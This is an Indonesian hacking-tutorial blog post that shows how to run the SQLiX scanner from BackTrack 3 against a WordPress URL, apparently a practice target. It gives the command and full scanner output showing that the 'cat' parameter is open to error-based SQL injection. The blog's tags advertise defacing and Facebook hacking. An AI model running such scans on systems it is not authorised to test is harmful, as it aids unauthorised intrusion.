Belajar Hacking

tutorial hacking, tools hacking, free tools, hacking, deface, facebook hacking, hack FB, gratis software, artikel hacking, cara hacking


ShoutMix chat widget

Counter

my space tracking
Discount Code

Google translate

Sponsored


Masukkan Code ini K1-EBD4CE-A
untuk berbelanja di KutuKutuBuku.com Ranking Search Engine
free counters

Alexa Siteinfo

Submit Your Site To The Web's Top 50 Search Engines for Free!
Search Engine Optimization and SEO Tools Sonic Run: Internet Search Engine

sms gratis ke semua operator

Followers

Home » Tanpa kategori » Penggunaan SQLiX with Backtrack 3

Penggunaan SQLiX with Backtrack 3

SQLiX adalah tool penganalisa vulnerability sebuah aplikasi web yang menggunakan database keluarga SQL (MySQL, MSSQL,...) di backend-nya terhadap serangan SQL Injection.

Option untuk test pertama sih biasanya ane pake seperti ini:
root@v87:/pentest/database/SQLiX# ./SQLiX.pl -all -agent mozilla/5.0 -v=3 -url="http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999"
======================================================
-- SQLiX --
© Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URL [http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999]
http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999
[+] working on HTTP User Agent
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[DEBUG] Page Y is NOT static ==> 4dTW01Ay/qZas5eddO4Xog
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] Method: SQL Blind Statement Injection
[DEBUG] Page Y is NOT static ==> 25SLzYsMx3gUPWm7Ul8lYw
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] Method: SQL Blind String Injection
[DEBUG] Page Y is NOT static ==> zh6vOvw0YinhgixLCdB0Bg
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] working on cat
[+] Method: MS-SQL error message
[+] Method: SQL error message
[FOUND] Match found INPUT:['] - "You have an error in your SQL syntax"
[INFO] Error with quote
[FOUND] SQL error message

RESULTS:
The variable [cat] from [http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999] is vulnerable to SQL Injection [Error message (') - MySQL].


Oke sekarang kita udah tau kalo target kita ini vulnerable terhadap SQL Injection dengan metode sqlerror message (dengan single quote ') <-- yeah ini memang vulnerability model jadul, tapi lumayan buat contoh!

gratz : indobacktrack.or.id
Anda baru saja membaca artikel yang berkategori dengan judul Penggunaan SQLiX with Backtrack 3. Anda bisa bookmark halaman ini dengan URL http://blogku-duniaku.blogspot.com/2010/02/penggunaan-sqlix-with-backtrack-3.html. Terima kasih!
Ditulis oleh: zenonk - Sabtu, 20 Februari 2010

Belum ada komentar untuk "Penggunaan SQLiX with Backtrack 3"

Posting Komentar

Langganan: Posting Komentar (Atom)

Sepakbola

Memuat...